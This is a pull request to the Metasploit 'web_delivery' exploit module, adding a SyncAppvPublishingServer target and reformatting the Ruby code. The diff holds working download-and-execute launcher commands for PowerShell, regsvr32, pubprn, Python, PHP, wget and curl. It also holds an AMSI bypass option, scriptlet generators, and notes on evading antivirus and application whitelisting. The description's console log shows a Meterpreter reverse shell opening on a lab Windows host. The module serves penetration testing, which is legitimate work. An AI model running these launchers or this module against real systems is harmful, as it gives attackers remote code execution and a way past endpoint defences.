### PR TITLE
web_delivery: Add SyncAppvPublishingServer target

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -13,149 +13,188 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'         => 'Script Web Delivery',
-      'Description'  => %q(
-           This module quickly fires up a web server that serves a payload.
-        The provided command which will allow for a payload to download and execute.
-        It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe
-        for bypassing application whitelisting. The main purpose of this module is to quickly establish
-        a session on a target machine when the attacker has to manually type in the command:
-        e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
-        This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege
-        escalations supplied by Meterpreter.
+    super(
+      update_info(
+        info,
+        'Name' => 'Script Web Delivery',
+        'Description' => %q{
+          This module quickly fires up a web server that serves a payload.
 
-        When using either of the PSH targets, ensure the payload architecture matches the target computer
-        or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
+          The module will provide a command to be run on the target machine
+          based on the selected target. The provided command will download
+          and execute a payload using either a specified scripting language
+          interpreter or "squiblydoo" via regsvr32.exe for bypassing
+          application whitelisting.
 
-        Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting.
-        The signed Microsoft binary file, Regsvr32, is able to request an .sct file
-        and then execute the included PowerShell command inside of it.
+          The main purpose of this module is to quickly establish a session on a
+          target machine when the attacker has to manually type in the command:
+          e.g. Command Injection, RDP Session, Local Access or maybe Remote
+          Command Execution.
 
-        Similarly, the pubprn target uses the pubprn.vbs script to request and
-        execute a .sct file.
+          This attack vector does not write to disk so it is less likely to
+          trigger AV solutions and will allow privilege escalations supplied
+          by Meterpreter.
 
-        Both web requests (i.e., the .sct file and PowerShell download/execute)
-        can occur on the same port.
+          When using either of the PSH targets, ensure the payload architecture
+          matches the target computer or use SYSWOW64 powershell.exe to execute
+          x86 payloads on x64 machines.
 
-        "PSH (Binary)" will write a file to the disk, allowing for custom binaries
-        to be served up to be downloaded and executed.
-      ),
-      'License'      => MSF_LICENSE,
-      'Author'       =>
-        [
-          'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
-          'Ben Campbell',
-          'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
-          'Casey Smith',    # AppLocker bypass research and vulnerability discovery (@subTee)
-          'Trenton Ivey',   # AppLocker MSF Module (kn0)
-          'g0tmi1k',        # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
-          'bcoles',         # support for pubprn and Linux wget
-          'phra',           # @phraaaaaaa // https://iwantmore.pizza/ - AMSI/SBL bypass
-        ],
-      'DefaultOptions' =>
-        {
-          'Payload'    => 'python/meterpreter/reverse_tcp',
-          'Powershell::exec_in_place' => true,
-          'Powershell::remove_comsec' => true,
+          Regsvr32 uses "squiblydoo" technique to bypass application whitelisting.
+          The signed Microsoft binary file, Regsvr32, is able to request an .sct
+          file and then execute the included PowerShell command inside of it.
+
+          Similarly, the pubprn target uses the pubprn.vbs script to request and
+          execute a .sct file.
+
+          Both web requests (i.e., the .sct file and PowerShell download/execute)
+          can occur on the same port.
+
+          The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe
+          Microsoft signed binary to request and execute a PowerShell script.
+
+          "PSH (Binary)" will write a file to the disk, allowing for custom binaries
+          to be served up to be downloaded and executed.
         },
-      'References'     =>
-        [
-          ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-          ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
-          ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
-          ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
-          ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
-          ['URL', 'https://iwantmore.pizza/posts/amsi.html'],
-        ],
-      'Platform'       => %w(python php win linux osx),
-      'Targets'        =>
-        [
-          ['Python', {
-            'Platform' => 'python',
-            'Arch' => ARCH_PYTHON
-          }],
-          ['PHP', {
-            'Platform' => 'php',
-            'Arch' => ARCH_PHP
-          }],
-          ['PSH', {
-            'Platform' => 'win',
-            'Arch' => [ARCH_X86, ARCH_X64]
-          }],
-          ['Regsvr32', {
-            'Platform' => 'win',
-            'Arch' => [ARCH_X86, ARCH_X64]
-          }],
-          ['pubprn', {
-            'Platform' => 'win',
-            'Arch' => [ARCH_X86, ARCH_X64]
-          }],
-          ['PSH (Binary)', {
-            'Platform' => 'win',
-            'Arch' => [ARCH_X86, ARCH_X64]
-          }],
-          ['Linux', {
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64]
-          }],
-          ['Mac OS X', {
-            'Platform' => 'osx',
-            'Arch' => [ARCH_X86, ARCH_X64]
-          }],
-        ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2013-07-19'
-    ))
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
+            'Ben Campbell',
+            'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
+            'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
+            'Trenton Ivey', # AppLocker MSF Module (kn0)
+            'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+            'bcoles', # support for targets: pubprn, SyncAppvPublishingServer and Linux wget
+            'Matt Nelson', # @enigma0x3 // pubprn discovery
+            'phra', # @phraaaaaaa // https://iwantmore.pizza/ - AMSI/SBL bypass
+            'Nick Landers', # @monoxgas // SyncAppvPublishingServer discovery
+          ],
+        'DefaultOptions' =>
+          {
+            'Payload' => 'python/meterpreter/reverse_tcp',
+            'Powershell::exec_in_place' => true,
+            'Powershell::remove_comsec' => true
+          },
+        'References' =>
+          [
+            ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+            ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+            ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+            ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
+            ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
+            ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
+            ['URL', 'https://iwantmore.pizza/posts/amsi.html'],
+            ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/'],
+            ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/SyncAppvPublishingServer/'],
+            ['URL', 'https://lolbas-project.github.io/lolbas/Scripts/Pubprn/'],
+          ],
+        'Platform' => %w[python php win linux osx],
+        'Targets' =>
+          [
+            [
+              'Python', {
+                'Platform' => 'python',
+                'Arch' => ARCH_PYTHON
+              }
+            ],
+            [
+              'PHP', {
+                'Platform' => 'php',
+                'Arch' => ARCH_PHP
+              }
+            ],
+            [
+              'PSH', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'Regsvr32', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'pubprn', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'SyncAppvPublishingServer', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'PSH (Binary)', {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'Linux', {
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+            [
+              'Mac OS X', {
+                'Platform' => 'osx',
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ],
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2013-07-19'
+      )
+    )
 
-  register_advanced_options(
-    [
-      OptBool.new('PSH-AmsiBypass',       [ true,  'PSH - Request AMSI/SBL bypass before the stager', true ]),
-      OptString.new('PSH-AmsiBypassURI',  [ false, 'PSH - The URL to use for the AMSI/SBL bypass (Will be random if left blank)', '' ]),
-      OptBool.new('PSH-EncodedCommand',   [ true,  'PSH - Use -EncodedCommand for web_delivery launcher', true ]),
-      OptBool.new('PSH-ForceTLS12',       [ true,  'PSH - Force use of TLS v1.2', true ]),
-      OptBool.new('PSH-Proxy',            [ true,  'PSH - Use the system proxy', true ]),
-      OptString.new('PSHBinary-PATH',     [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
-      OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
-    ]
-  )
+    register_advanced_options(
+      [
+        OptBool.new('PSH-AmsiBypass', [ true, 'PSH - Request AMSI/SBL bypass before the stager', true ]),
+        OptString.new('PSH-AmsiBypassURI', [ false, 'PSH - The URL to use for the AMSI/SBL bypass (Will be random if left blank)', '' ]),
+        OptBool.new('PSH-EncodedCommand', [ true, 'PSH - Use -EncodedCommand for web_delivery launcher', true ]),
+        OptBool.new('PSH-ForceTLS12', [ true, 'PSH - Force use of TLS v1.2', true ]),
+        OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
+        OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
+        OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
+      ]
+    )
   end
 
   def primer
-    php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));")
-    python = %Q(python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}', context=ssl._create_unverified_context());exec(r.read());")
-    regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
-    pubprn = %Q(C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct)
-
-    print_status("Run the following command on the target machine:")
+    print_status('Run the following command on the target machine:')
 
     case target.name
     when 'PHP'
-      print_line("#{php}")
+      print_line(%(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"))
     when 'Python'
-      print_line("#{python}")
+      print_line(%(python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}', context=ssl._create_unverified_context());exec(r.read());"))
     when 'PSH'
       uri = get_uri
       if datastore['PSH-AmsiBypass']
         amsi_uri = uri + amsi_bypass_uri
-        print_line("#{gen_psh([amsi_uri, uri], "string")}")
+        print_line(gen_psh([amsi_uri, uri], 'string').to_s)
       else
-        print_line("#{gen_psh(uri, "string")}")
+        print_line(gen_psh(uri, 'string').to_s)
       end
     when 'pubprn'
-      print_line("#{pubprn}")
+      print_line(%(C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct))
+    when 'SyncAppvPublishingServer'
+      print_line(%(SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('#{get_uri}') | IEX"))
     when 'Regsvr32'
-      print_line("#{regsvr}")
+      print_line(%(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll))
     when 'PSH (Binary)'
-      psh = gen_psh("#{get_uri}", "download")
-      print_line("#{psh}")
+      psh = gen_psh(get_uri.to_s, 'download')
+      print_line(psh.to_s)
     when 'Linux'
-      fname = Rex::Text.rand_text_alphanumeric 8
-      print_line "wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}& disown"
+      fname = Rex::Text.rand_text_alphanumeric(8)
+      print_line("wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}& disown")
     when 'Mac OS X'
-      fname = Rex::Text.rand_text_alphanumeric 8
-      print_line "curl -sk --output #{fname} #{get_uri}; chmod +x #{fname}; ./#{fname}& disown"
+      fname = Rex::Text.rand_text_alphanumeric(8)
+      print_line("curl -sk --output #{fname} #{get_uri}; chmod +x #{fname}; ./#{fname}& disown")
     end
   end
 
@@ -168,8 +207,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     if request.raw_uri.to_s.ends_with?('.sct')
-      print_status("Handling .sct Request")
-      psh = gen_psh("#{get_uri}", "string")
+      print_status('Handling .sct Request')
+      psh = gen_psh(get_uri.to_s, 'string')
 
       case target.name
       when 'pubprn'
@@ -182,7 +221,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
       send_response(cli, data, 'Content-Type' => 'text/plain')
       return
-    elsif request.raw_uri.to_s.ends_with?(amsi_bypass_uri)
+    end
+
+    if request.raw_uri.to_s.ends_with?(amsi_bypass_uri)
       data = bypass_powershell_protections
       print_status("Delivering AMSI Bypass (#{data.length} bytes)")
       send_response(cli, data, 'Content-Type' => 'text/plain')
@@ -190,17 +231,15 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target.name
-    when 'Linux', 'Mac OS X'
+    when 'Linux', 'Mac OS X', 'PSH (Binary)'
       data = generate_payload_exe
-    when 'PSH (Binary)'
-      data = generate_payload_exe
-    when 'PSH', 'Regsvr32', 'pubprn'
+    when 'PSH', 'Regsvr32', 'pubprn', 'SyncAppvPublishingServer'
       data = cmd_psh_payload(
         payload.encoded,
-        payload_instance.arch.first,
+        payload_instance.arch.first
       )
     else
-      data = %Q(#{payload.encoded})
+      data = payload.encoded.to_s
     end
 
     print_status("Delivering Payload (#{data.length} bytes)")
@@ -212,19 +251,19 @@ class MetasploitModule < Msf::Exploit::Remote
     force_tls12 = Rex::Powershell::PshMethods.force_tls12 if datastore['PSH-ForceTLS12']
 
     if method.include? 'string'
-      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
+      download_string = datastore['PSH-Proxy'] ? Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) : Rex::Powershell::PshMethods.download_and_exec_string(url)
     else
       # Random filename to use, if there isn't anything set
-      random = "#{rand_text_alphanumeric 8}.exe"
+      random = "#{rand_text_alphanumeric(8)}.exe"
 
       # Set filename (Use random filename if empty)
       filename = datastore['PSHBinary-FILENAME'].blank? ? random : datastore['PSHBinary-FILENAME']
 
       # Set path (Use %TEMP% if empty)
-      path = datastore['PSHBinary-PATH'].blank? ? "$env:temp" : %Q('#{datastore['PSHBinary-PATH']}')
+      path = datastore['PSHBinary-PATH'].blank? ? '$env:temp' : %('#{datastore['PSHBinary-PATH']}')
 
       # Join Path and Filename
-      file = %Q(echo (#{path}+'\\#{filename}'))
+      file = %(echo (#{path}+'\\#{filename}'))
 
       # Generate download PowerShell command
       download_string = Rex::Powershell::PshMethods.download_run(url, file)
@@ -232,26 +271,24 @@ class MetasploitModule < Msf::Exploit::Remote
 
     download_and_run = "#{force_tls12}#{ignore_cert}#{download_string}"
 
+    # Generate main PowerShell command
     if datastore['PSH-EncodedCommand']
       download_and_run = encode_script(download_and_run)
       return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: download_and_run)
-    else
-      return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
     end
 
-    # Generate main PowerShell command
     return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
   end
 
   def rand_class_id
-    "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
+    "#{Rex::Text.rand_text_hex(8)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(12)}"
   end
 
   def gen_sct_file(command)
-    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
+    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric(8)}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
   end
 
   def gen_pubprn_sct_file(command)
-    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}" remotable="true"></registration><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></scriptlet>}
+    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric(8)}" classid="{#{rand_class_id}}" remotable="true"></registration><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></scriptlet>}
   end
 end


### PR DESCRIPTION
Marvel as I turn this module into an even larger dumpster fire.

Marvel, also, as I run `rubocop -a`, thus eliminating any chance of deciphering the changes implemented in this module.


```
msf6 exploit(multi/script/web_delivery) > rexploit 
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job 25.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:1337 
[*] Using URL: http://0.0.0.0:8080/qS47Qfin
[*] Local IP: http://172.16.191.165:8080/qS47Qfin
[*] Server started.
[*] Run the following command on the target machine:
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://172.16.191.165:8080/qS47Qfin') | IEX"
msf6 exploit(multi/script/web_delivery) > [*] 172.16.191.200   web_delivery - Delivering Payload (2088 bytes)

msf6 exploit(multi/script/web_delivery) > 
[*] Sending stage (200262 bytes) to 172.16.191.200
[*] Meterpreter session 2 opened (172.16.191.165:1337 -> 172.16.191.200:49846) at 2020-12-05 01:17:27 -0500

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  2         meterpreter x64/windows  WINDEV1710EVAL\User @ WINDEV1710EVAL  172.16.191.165:1337 -> 172.16.191.200:49846 (172.16.191.200)

msf6 exploit(multi/script/web_delivery) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WINDEV1710EVAL\User
meterpreter > 
```